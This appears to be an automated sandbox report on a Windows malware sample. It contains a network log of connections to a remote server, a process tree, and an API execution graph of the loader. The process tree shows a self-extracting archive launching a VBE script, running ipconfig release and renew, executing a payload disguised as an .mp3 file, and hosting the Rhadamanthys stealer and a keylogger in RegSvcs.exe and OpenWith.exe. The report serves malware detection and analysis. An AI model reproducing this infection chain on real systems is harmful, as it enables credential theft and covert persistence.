                                              Nov 21, 2024 13:46:31.393874884 CET51514980951.75.171.9192.168.2.4
                                              Nov 21, 2024 13:46:36.265681982 CET498315151192.168.2.451.75.171.9
                                              Nov 21, 2024 13:46:36.385243893 CET51514983151.75.171.9192.168.2.4
                                              Nov 21, 2024 13:46:36.385369062 CET498315151192.168.2.451.75.171.9
                                              Nov 21, 2024 13:46:36.385493040 CET498315151192.168.2.451.75.171.9
                                              Nov 21, 2024 13:46:36.504888058 CET51514983151.75.171.9192.168.2.4
                                              Nov 21, 2024 13:46:38.546334028 CET51514983151.75.171.9192.168.2.4
                                              Nov 21, 2024 13:46:38.546461105 CET498315151192.168.2.451.75.171.9
                                              Nov 21, 2024 13:46:41.289259911 CET498315151192.168.2.451.75.171.9
                                              Nov 21, 2024 13:46:41.409708023 CET51514983151.75.171.9192.168.2.4
                                              Nov 21, 2024 13:46:46.296703100 CET498565151192.168.2.451.75.171.9
                                              Nov 21, 2024 13:46:46.416466951 CET51514985651.75.171.9192.168.2.4
                                              Nov 21, 2024 13:46:46.416636944 CET498565151192.168.2.451.75.171.9
                                              Nov 21, 2024 13:46:46.416908979 CET498565151192.168.2.451.75.171.9
                                              Nov 21, 2024 13:46:46.536489964 CET51514985651.75.171.9192.168.2.4
                                              Nov 21, 2024 13:46:48.580765963 CET51514985651.75.171.9192.168.2.4
                                              Nov 21, 2024 13:46:48.580918074 CET498565151192.168.2.451.75.171.9
                                              Nov 21, 2024 13:46:51.304784060 CET498565151192.168.2.451.75.171.9
                                              Nov 21, 2024 13:46:51.426680088 CET51514985651.75.171.9192.168.2.4
                                              Nov 21, 2024 13:46:56.305840015 CET498775151192.168.2.451.75.171.9
                                              Nov 21, 2024 13:46:56.425549984 CET51514987751.75.171.9192.168.2.4
                                              Nov 21, 2024 13:46:56.425637960 CET498775151192.168.2.451.75.171.9
                                              Nov 21, 2024 13:46:56.425986052 CET498775151192.168.2.451.75.171.9
                                              Nov 21, 2024 13:46:56.545497894 CET51514987751.75.171.9192.168.2.4
                                              Nov 21, 2024 13:46:58.581823111 CET51514987751.75.171.9192.168.2.4
                                              Nov 21, 2024 13:46:58.581901073 CET498775151192.168.2.451.75.171.9
                                              Nov 21, 2024 13:47:01.302576065 CET498775151192.168.2.451.75.171.9
                                              Nov 21, 2024 13:47:01.422352076 CET51514987751.75.171.9192.168.2.4

                                              Click to jump to process

                                              Click to jump to process

                                              Click to dive into process behavior distribution

                                              Click to jump to process

                                              Target ID:0
                                              Start time:07:44:58
                                              Start date:21/11/2024
                                              Path:C:\Users\user\Desktop\ngPebbPhbp.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Users\user\Desktop\ngPebbPhbp.exe"
                                              Imagebase:0xb00000
                                              File size:1'684'188 bytes
                                              MD5 hash:FA000351E26E17543F67E3DEDC97D37E
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:low
                                              Has exited:true

                                              Target ID:1
                                              Start time:07:45:02
                                              Start date:21/11/2024
                                              Path:C:\Windows\SysWOW64\wscript.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\RarSFX0\rmxb.vbe"
                                              Imagebase:0xa70000
                                              File size:147'456 bytes
                                              MD5 hash:FF00E0480075B095948000BDC66E81F0
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              Target ID:2
                                              Start time:07:45:09
                                              Start date:21/11/2024
                                              Path:C:\Windows\SysWOW64\cmd.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Windows\System32\cmd.exe" /c ipconfig /release
                                              Imagebase:0x240000
                                              File size:236'544 bytes
                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              Target ID:3
                                              Start time:07:45:09
                                              Start date:21/11/2024
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff7699e0000
                                              File size:862'208 bytes
                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              Target ID:4
                                              Start time:07:45:09
                                              Start date:21/11/2024
                                              Path:C:\Windows\SysWOW64\cmd.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Windows\System32\cmd.exe" /c qwlvpmrupf.mp3 tnlupe.mp3
                                              Imagebase:0x240000
                                              File size:236'544 bytes
                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              Target ID:5
                                              Start time:07:45:10
                                              Start date:21/11/2024
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff7699e0000
                                              File size:862'208 bytes
                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              Target ID:6
                                              Start time:07:45:10
                                              Start date:21/11/2024
                                              Path:C:\Windows\SysWOW64\ipconfig.exe
                                              Wow64 process (32bit):true
                                              Commandline:ipconfig /release
                                              Imagebase:0x940000
                                              File size:29'184 bytes
                                              MD5 hash:3A3B9A5E00EF6A3F83BF300E2B6B67BB
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:moderate
                                              Has exited:true

                                              Target ID:7
                                              Start time:07:45:10
                                              Start date:21/11/2024
                                              Path:C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3
                                              Wow64 process (32bit):true
                                              Commandline:qwlvpmrupf.mp3 tnlupe.mp3
                                              Imagebase:0x370000
                                              File size:947'288 bytes
                                              MD5 hash:0ADB9B817F1DF7807576C2D7068DD931
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Antivirus matches:
                                              • Detection: 0%, ReversingLabs
                                              Reputation:moderate
                                              Has exited:true

                                              Target ID:8
                                              Start time:07:45:13
                                              Start date:21/11/2024
                                              Path:C:\Windows\SysWOW64\cmd.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Windows\System32\cmd.exe" /c ipconfig /renew
                                              Imagebase:0x240000
                                              File size:236'544 bytes
                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              Target ID:9
                                              Start time:07:45:13
                                              Start date:21/11/2024
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff7699e0000
                                              File size:862'208 bytes
                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              Target ID:10
                                              Start time:07:45:13
                                              Start date:21/11/2024
                                              Path:C:\Windows\SysWOW64\ipconfig.exe
                                              Wow64 process (32bit):true
                                              Commandline:ipconfig /renew
                                              Imagebase:0x940000
                                              File size:29'184 bytes
                                              MD5 hash:3A3B9A5E00EF6A3F83BF300E2B6B67BB
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Has exited:true

                                              Target ID:14
                                              Start time:07:45:21
                                              Start date:21/11/2024
                                              Path:C:\Users\user\AppData\Local\Temp\RegSvcs.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Users\user\AppData\Local\Temp\RegSvcs.exe"
                                              Imagebase:0x5c0000
                                              File size:45'984 bytes
                                              MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 0000000E.00000002.1935619525.00000000060B0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                              Antivirus matches:
                                              • Detection: 0%, ReversingLabs
                                              Has exited:true

                                              Target ID:15
                                              Start time:07:45:21
                                              Start date:21/11/2024
                                              Path:C:\Windows\SysWOW64\OpenWith.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Windows\system32\openwith.exe"
                                              Imagebase:0x1b0000
                                              File size:107'368 bytes
                                              MD5 hash:0ED31792A7FFF811883F80047CBCFC91
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 0000000F.00000002.2946403129.0000000005A41000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 0000000F.00000003.1935175992.00000000059C0000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 0000000F.00000003.1961307501.0000000005639000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 0000000F.00000003.1932421408.00000000034E0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 0000000F.00000003.1934921441.00000000057A0000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
                                              Has exited:false

                                              Target ID:16
                                              Start time:07:45:25
                                              Start date:21/11/2024
                                              Path:C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Users\user\AppData\Roaming\wlnk\QWLVPM~1.EXE" C:\Users\user\AppData\Roaming\wlnk\tnlupe.mp3
                                              Imagebase:0xd90000
                                              File size:947'288 bytes
                                              MD5 hash:0ADB9B817F1DF7807576C2D7068DD931
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Antivirus matches:
                                              • Detection: 0%, ReversingLabs
                                              Has exited:true

                                              Target ID:17
                                              Start time:07:45:34
                                              Start date:21/11/2024
                                              Path:C:\Users\user\AppData\Local\Temp\RegSvcs.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Users\user\AppData\Local\Temp\RegSvcs.exe"
                                              Imagebase:0xd00000
                                              File size:45'984 bytes
                                              MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 00000011.00000002.2068593152.00000000066C3000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                              Has exited:true

                                              Target ID:18
                                              Start time:07:45:39
                                              Start date:21/11/2024
                                              Path:C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Users\user\AppData\Roaming\wlnk\QWLVPM~1.EXE" C:\Users\user\AppData\Roaming\wlnk\tnlupe.mp3
                                              Imagebase:0xd90000
                                              File size:947'288 bytes
                                              MD5 hash:0ADB9B817F1DF7807576C2D7068DD931
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Has exited:true

                                              Target ID:19
                                              Start time:07:45:47
                                              Start date:21/11/2024
                                              Path:C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Users\user\AppData\Roaming\wlnk\QWLVPM~1.EXE" C:\Users\user\AppData\Roaming\wlnk\tnlupe.mp3
                                              Imagebase:0xd90000
                                              File size:947'288 bytes
                                              MD5 hash:0ADB9B817F1DF7807576C2D7068DD931
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Has exited:true

                                              Target ID:20
                                              Start time:07:45:47
                                              Start date:21/11/2024
                                              Path:C:\Users\user\AppData\Local\Temp\RegSvcs.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Users\user\AppData\Local\Temp\RegSvcs.exe"
                                              Imagebase:0x7e0000
                                              File size:45'984 bytes
                                              MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 00000014.00000002.2208992211.00000000062C3000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                              Has exited:true

                                              Target ID:21
                                              Start time:07:45:55
                                              Start date:21/11/2024
                                              Path:C:\Users\user\AppData\Local\Temp\RegSvcs.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Users\user\AppData\Local\Temp\RegSvcs.exe"
                                              Imagebase:0x270000
                                              File size:45'984 bytes
                                              MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 00000015.00000002.2287549394.0000000005FC3000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                              Has exited:true

                                              Reset < >

                                                Execution Graph

                                                Execution Coverage:10%
                                                Dynamic/Decrypted Code Coverage:0%
                                                Signature Coverage:10.8%
                                                Total number of Nodes:1939
                                                Total number of Limit Nodes:38
                                                execution_graph 27570 b0e0b0 27571 b0e0c9 27570->27571 27576 b0e850 27571->27576 27573 b0e0fb 27574 b0e850 111 API calls 27574->27573 27577 b0e862 27576->27577 27578 b0e875 27576->27578 27579 b0e0cd 27577->27579 27585 b09490 109 API calls 27577->27585 27578->27579 27581 b0e888 SetFilePointer 27578->27581 27579->27574 27581->27579 27582 b0e8a4 GetLastError 27581->27582 27582->27579 27583 b0e8ae 27582->27583 27583->27579 27586 b09490 109 API calls 27583->27586 27585->27578 27586->27579 27587 b26452 27588 b2645e __FrameHandler3::FrameUnwindToState 27587->27588 27619 b25e63 27588->27619 27590 b26465 27591 b265b8 27590->27591 27594 b2648f 27590->27594 27722 b26878 4 API calls 2 library calls 27591->27722 27593 b265bf 27715 b2ee14 27593->27715 27607 b264ce ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 27594->27607 27630 b2f9ad 27594->27630 27601 b264ae 27603 b2652f 27638 b26993 GetStartupInfoW __cftof 27603->27638 27605 b26535 27639 b2f8fe 51 API calls 27605->27639 27607->27603 27718 b2e9b0 38 API calls 2 library calls 27607->27718 27609 b2653d 27640 b2454a 27609->27640 27613 b26551 27613->27593 27614 b26555 27613->27614 27615 b2655e 27614->27615 27720 b2edb7 28 API calls _abort 27614->27720 27721 b25fd4 12 API calls ___scrt_uninitialize_crt 27615->27721 27618 b26566 27618->27601 27620 b25e6c 27619->27620 27724 b26694 IsProcessorFeaturePresent 27620->27724 27622 b25e78 27725 b296d9 10 API calls 2 library calls 27622->27725 27624 b25e81 27624->27590 27625 b25e7d 27625->27624 27726 b2f837 27625->27726 27628 b25e98 27628->27590 27633 b2f9c4 27630->27633 27631 b25734 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 27632 b264a8 27631->27632 27632->27601 27634 b2f951 27632->27634 27633->27631 27635 b2f980 27634->27635 27636 b25734 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 27635->27636 27637 b2f9a9 27636->27637 27637->27607 27638->27605 27639->27609 27742 b16d7b 27640->27742 27644 b24572 27833 b1f4d4 27644->27833 27646 b2457b __cftof 27837 b1f89a 27646->27837 27650 b24608 GetCommandLineW 27651 b24618 27650->27651 27652 b246f9 27650->27652 27654 b014a7 28 API calls 27651->27654 27653 b113f9 29 API calls 27652->27653 27655 b24703 27653->27655 27656 b24622 27654->27656 27657 b025a4 26 API calls 27655->27657 27658 b219ee 115 API calls 27656->27658 27659 b24710 27657->27659 27660 b2462c 27658->27660 27661 b01a66 26 API calls 27659->27661 27662 b01a66 26 API calls 27660->27662 27663 b24719 SetEnvironmentVariableW GetLocalTime 27661->27663 27664 b24635 27662->27664 27668 b0f6ba _swprintf 51 API calls 27663->27668 27666 b24642 OpenFileMappingW 27664->27666 27667 b246dc 27664->27667 27670 b246d2 CloseHandle 27666->27670 27671 b2465b MapViewOfFile 27666->27671 27669 b014a7 28 API calls 27667->27669 27672 b2477e SetEnvironmentVariableW GetModuleHandleW LoadIconW 27668->27672 27673 b246e6 27669->27673 27670->27652 27671->27670 27674 b2466b UnmapViewOfFile MapViewOfFile 27671->27674 27676 b207e5 34 API calls 27672->27676 27677 b23efc 30 API calls 27673->27677 27674->27670 27675 b24689 27674->27675 27679 b1fc38 28 API calls 27675->27679 27680 b247bc 27676->27680 27678 b246f0 27677->27678 27681 b01a66 26 API calls 27678->27681 27682 b24699 27679->27682 27683 b13538 133 API calls 27680->27683 27681->27652 27685 b23efc 30 API calls 27682->27685 27684 b247cc 27683->27684 27686 b1d255 28 API calls 27684->27686 27687 b246a2 27685->27687 27688 b247d8 27686->27688 27689 b15109 114 API calls 27687->27689 27690 b1d255 28 API calls 27688->27690 27691 b246b5 27689->27691 27692 b247e1 DialogBoxParamW 27690->27692 27693 b151bf 114 API calls 27691->27693 27694 b1d347 26 API calls 27692->27694 27695 b246c0 27693->27695 27696 b2481e 27694->27696 27698 b246cb UnmapViewOfFile 27695->27698 27697 b1d347 26 API calls 27696->27697 27699 b2482a 27697->27699 27698->27670 27700 b24833 Sleep 27699->27700 27701 b2483a 27699->27701 27700->27701 27702 b24848 27701->27702 27703 b1fb4b 48 API calls 27701->27703 27704 b24852 DeleteObject 27702->27704 27703->27702 27705 b24867 DeleteObject 27704->27705 27706 b2486e 27704->27706 27705->27706 27707 b248b0 27706->27707 27708 b2489e 27706->27708 27710 b1f53a GdiplusShutdown CoUninitialize 27707->27710 27709 b23fcf 6 API calls 27708->27709 27711 b248a4 CloseHandle 27709->27711 27712 b248ea 27710->27712 27711->27707 27713 b25734 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 27712->27713 27714 b248fd 27713->27714 27719 b269c9 GetModuleHandleW 27714->27719 28248 b2eb91 27715->28248 27718->27603 27719->27613 27720->27615 27721->27618 27722->27593 27724->27622 27725->27625 27730 b32d0a 27726->27730 27729 b296f8 7 API calls 2 library calls 27729->27624 27731 b32d23 27730->27731 27734 b25734 27731->27734 27733 b25e8a 27733->27628 27733->27729 27735 b2573c 27734->27735 27736 b2573d IsProcessorFeaturePresent 27734->27736 27735->27733 27738 b25bfc 27736->27738 27741 b25bbf SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 27738->27741 27740 b25cdf 27740->27733 27741->27740 27853 b25b20 27742->27853 27745 b16dd3 GetProcAddress 27747 b16de5 27745->27747 27748 b16dfd GetProcAddress 27745->27748 27746 b16e28 27749 b1719b 27746->27749 27923 b2e50e 42 API calls __vsnwprintf_l 27746->27923 27747->27748 27748->27746 27750 b16e0f 27748->27750 27855 b113f9 27749->27855 27750->27746 27753 b17098 27753->27749 27755 b113f9 29 API calls 27753->27755 27754 b171a6 27866 b12117 27754->27866 27757 b170ac 27755->27757 27758 b170ba 27757->27758 27759 b170bd CreateFileW 27757->27759 27758->27759 27761 b17186 CloseHandle 27759->27761 27762 b170db SetFilePointer 27759->27762 27764 b01a66 26 API calls 27761->27764 27762->27761 27763 b170ed ReadFile 27762->27763 27763->27761 27765 b17109 27763->27765 27766 b17199 27764->27766 27769 b173f2 27765->27769 27770 b1711a 27765->27770 27766->27749 27936 b25ce1 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess IsProcessorFeaturePresent 27769->27936 27771 b014a7 28 API calls 27770->27771 27778 b17133 27771->27778 27773 b171de CompareStringW 27779 b171ba 27773->27779 27775 b173f7 27780 b17176 27778->27780 27790 b16c5e 30 API calls 27778->27790 27924 b16366 27778->27924 27779->27773 27799 b17248 27779->27799 27870 b1067e 27779->27870 27875 b16c5e 27779->27875 27899 b014a7 27779->27899 27903 b1229d 27779->27903 27907 b01a66 27779->27907 27911 b0ed1f 27779->27911 27785 b01a66 26 API calls 27780->27785 27781 b17292 27783 b173bd 27781->27783 27784 b1729e 27781->27784 27787 b01a66 26 API calls 27783->27787 27928 b12187 45 API calls 27784->27928 27788 b1717e 27785->27788 27792 b173c5 27787->27792 27793 b01a66 26 API calls 27788->27793 27789 b014a7 28 API calls 27789->27799 27790->27778 27791 b172a7 27794 b1067e 6 API calls 27791->27794 27795 b01a66 26 API calls 27792->27795 27793->27761 27797 b172ac 27794->27797 27798 b173cd 27795->27798 27796 b1229d 45 API calls 27796->27799 27800 b172b3 27797->27800 27801 b17332 27797->27801 27802 b25734 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 27798->27802 27799->27781 27799->27789 27799->27796 27803 b01a66 26 API calls 27799->27803 27809 b0ed1f 49 API calls 27799->27809 27804 b16c5e 30 API calls 27800->27804 27805 b16a25 53 API calls 27801->27805 27806 b173e8 27802->27806 27803->27799 27807 b172bd 27804->27807 27808 b1735b AllocConsole 27805->27808 27824 b11309 27806->27824 27810 b16c5e 30 API calls 27807->27810 27811 b17368 GetCurrentProcessId AttachConsole 27808->27811 27823 b17310 27808->27823 27809->27799 27812 b172c7 27810->27812 27813 b17383 27811->27813 27929 b14318 27812->27929 27818 b1738c GetStdHandle WriteConsoleW Sleep FreeConsole 27813->27818 27815 b173b5 ExitProcess 27818->27823 27820 b14318 53 API calls 27821 b17307 27820->27821 27822 b014a7 28 API calls 27821->27822 27822->27823 27823->27815 28246 b257a5 27824->28246 27826 b11315 GetCurrentDirectoryW 27827 b11327 27826->27827 27830 b11323 27826->27830 28247 b01bbd 28 API calls 27827->28247 27829 b11339 GetCurrentDirectoryW 27831 b11356 _wcslen 27829->27831 27830->27644 27831->27830 27832 b012a7 26 API calls 27831->27832 27832->27830 27834 b16c5e 30 API calls 27833->27834 27835 b1f4e8 OleInitialize 27834->27835 27836 b1f50b GdiplusStartup SHGetMalloc 27835->27836 27836->27646 27838 b025a4 26 API calls 27837->27838 27839 b1f8a8 27838->27839 27840 b025a4 26 API calls 27839->27840 27841 b1f8b4 27840->27841 27842 b025a4 26 API calls 27841->27842 27843 b1f8c0 27842->27843 27844 b025a4 26 API calls 27843->27844 27845 b1f8cc 27844->27845 27846 b1f84c 27845->27846 27847 b01a66 26 API calls 27846->27847 27848 b1f857 27847->27848 27849 b01a66 26 API calls 27848->27849 27850 b1f85f 27849->27850 27851 b01a66 26 API calls 27850->27851 27852 b1f867 27851->27852 27854 b16d8d GetModuleHandleW 27853->27854 27854->27745 27854->27746 27856 b11405 __EH_prolog3 27855->27856 27937 b256f6 27856->27937 27858 b11431 GetModuleFileNameW 27859 b11463 27858->27859 27860 b1140f 27858->27860 27862 b014a7 28 API calls 27859->27862 27860->27858 27860->27859 27951 b01be3 27860->27951 27863 b1146c 27862->27863 27864 b1147f 27863->27864 27955 b012a7 27863->27955 27864->27754 27867 b12124 27866->27867 27974 b0769f 27867->27974 27871 b106a4 GetVersionExW 27870->27871 27872 b106d1 27870->27872 27871->27872 27873 b25734 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 27872->27873 27874 b106fa 27873->27874 27874->27779 27876 b16c6a __EH_prolog3_GS 27875->27876 27877 b256f6 28 API calls 27876->27877 27878 b16c77 27877->27878 27879 b16c8d GetSystemDirectoryW 27878->27879 27880 b16cab 27879->27880 27883 b16ca4 27879->27883 27881 b014a7 28 API calls 27880->27881 27884 b16ccd 27881->27884 27882 b16d71 28020 b25787 27882->28020 27883->27882 27885 b012a7 26 API calls 27883->27885 27887 b014a7 28 API calls 27884->27887 27885->27882 27888 b16cda 27887->27888 28010 b11ad1 27888->28010 27892 b01a66 26 API calls 27893 b16cf7 27892->27893 27894 b01a66 26 API calls 27893->27894 27895 b16cff LoadLibraryW 27894->27895 27895->27883 27897 b16d1c 27895->27897 27897->27883 28023 b019a9 26 API calls 27897->28023 27900 b014bd _wcslen 27899->27900 27901 b0120c 28 API calls 27900->27901 27902 b014ca 27901->27902 27902->27779 27904 b122a6 27903->27904 28040 b1236c 27904->28040 27908 b01a80 27907->27908 27909 b01a71 27907->27909 27908->27779 27910 b012a7 26 API calls 27909->27910 27910->27908 27912 b0ed2b __EH_prolog3_GS 27911->27912 27913 b0ed38 GetFileAttributesW 27912->27913 27914 b0ed46 27913->27914 27921 b0edad 27913->27921 28053 b1169a 27914->28053 27915 b25787 5 API calls 27917 b0edc3 27915->27917 27917->27779 27919 b0ed81 27919->27921 28110 b019a9 26 API calls 27919->28110 27920 b0ed78 GetFileAttributesW 27920->27919 27921->27915 27923->27753 27925 b16380 27924->27925 27926 b163b7 27925->27926 27927 b01b63 28 API calls 27925->27927 27926->27778 27927->27925 27928->27791 27930 b14328 27929->27930 28123 b14349 27930->28123 27933 b16a25 28150 b168d4 27933->28150 27936->27775 27940 b256fb 27937->27940 27939 b25715 27939->27860 27940->27939 27942 b25717 27940->27942 27959 b2d08c 27940->27959 27969 b2e91a 7 API calls 2 library calls 27940->27969 27943 b01a25 Concurrency::cancel_current_task 27942->27943 27944 b25721 27942->27944 27966 b2734a 27943->27966 27947 b2734a _com_raise_error RaiseException 27944->27947 27946 b01a41 27949 b01a5a 27946->27949 27950 b012a7 26 API calls 27946->27950 27948 b26628 27947->27948 27949->27860 27950->27949 27952 b01c03 27951->27952 27954 b01bfb 27951->27954 27952->27954 27972 b01c33 28 API calls 27952->27972 27954->27860 27956 b012c1 27955->27956 27957 b012b4 27955->27957 27956->27864 27973 b019a9 26 API calls 27957->27973 27964 b3040e __dosmaperr 27959->27964 27960 b3044c 27971 b301d3 20 API calls __dosmaperr 27960->27971 27961 b30437 RtlAllocateHeap 27963 b3044a 27961->27963 27961->27964 27963->27940 27964->27960 27964->27961 27970 b2e91a 7 API calls 2 library calls 27964->27970 27967 b27391 RaiseException 27966->27967 27968 b27364 27966->27968 27967->27946 27968->27967 27969->27940 27970->27964 27971->27963 27972->27954 27973->27956 27975 b076e1 27974->27975 27976 b076bb 27974->27976 27990 b058cb 45 API calls 27975->27990 27981 b0120c 27976->27981 27980 b076db 27980->27779 27982 b0127d 27981->27982 27985 b0121d 27981->27985 27998 b01a92 28 API calls std::_Xinvalid_argument 27982->27998 27989 b01228 27985->27989 27991 b012d3 28 API calls Concurrency::cancel_current_task 27985->27991 27987 b01254 27992 b011b8 27987->27992 27989->27980 27991->27987 27993 b011c3 27992->27993 27994 b011cb 27992->27994 27999 b011dd 27993->27999 27996 b011c9 27994->27996 27997 b256f6 28 API calls 27994->27997 27996->27989 27997->27996 28000 b01206 27999->28000 28001 b011e8 27999->28001 28009 b01a25 27 API calls 2 library calls 28000->28009 28002 b256f6 28 API calls 28001->28002 28005 b011ee 28002->28005 28004 b0120b 28006 b011f5 28005->28006 28008 b2ac9e 26 API calls _abort 28005->28008 28006->27996 28009->28004 28011 b11add __EH_prolog3_GS 28010->28011 28024 b07673 28011->28024 28013 b11aef 28015 b11b0c 28013->28015 28028 b10ddb 28 API calls 28013->28028 28016 b01a66 26 API calls 28015->28016 28017 b11b35 28016->28017 28018 b25787 5 API calls 28017->28018 28019 b11b3a 28018->28019 28019->27892 28021 b25734 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 28020->28021 28022 b16d78 28021->28022 28022->27779 28023->27883 28025 b0768c 28024->28025 28029 b07430 28025->28029 28027 b07699 28027->28013 28028->28015 28030 b07493 28029->28030 28033 b07441 28029->28033 28039 b01a92 28 API calls std::_Xinvalid_argument 28030->28039 28037 b0744c 28033->28037 28038 b012d3 28 API calls Concurrency::cancel_current_task 28033->28038 28035 b07471 28036 b011b8 28 API calls 28035->28036 28036->28037 28037->28027 28038->28035 28041 b12378 28040->28041 28044 b1238e 28041->28044 28043 b122b6 28043->27779 28045 b124e5 28044->28045 28048 b123a4 28044->28048 28052 b058cb 45 API calls 28045->28052 28050 b123bc 28048->28050 28051 b10c7f 28 API calls 28048->28051 28050->28043 28051->28050 28054 b116e7 28053->28054 28069 b116e0 28053->28069 28055 b014a7 28 API calls 28054->28055 28058 b116f4 28055->28058 28056 b25734 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 28057 b0ed68 28056->28057 28057->27919 28057->27920 28059 b11711 28058->28059 28060 b117db 28058->28060 28062 b1171b 28059->28062 28074 b11741 28059->28074 28061 b11309 30 API calls 28060->28061 28068 b117fb 28061->28068 28111 b10ba6 28 API calls 28062->28111 28063 b118ed 28075 b11739 28063->28075 28122 b019a9 26 API calls 28063->28122 28065 b11729 28112 b025a4 28065->28112 28066 b01a66 26 API calls 28066->28069 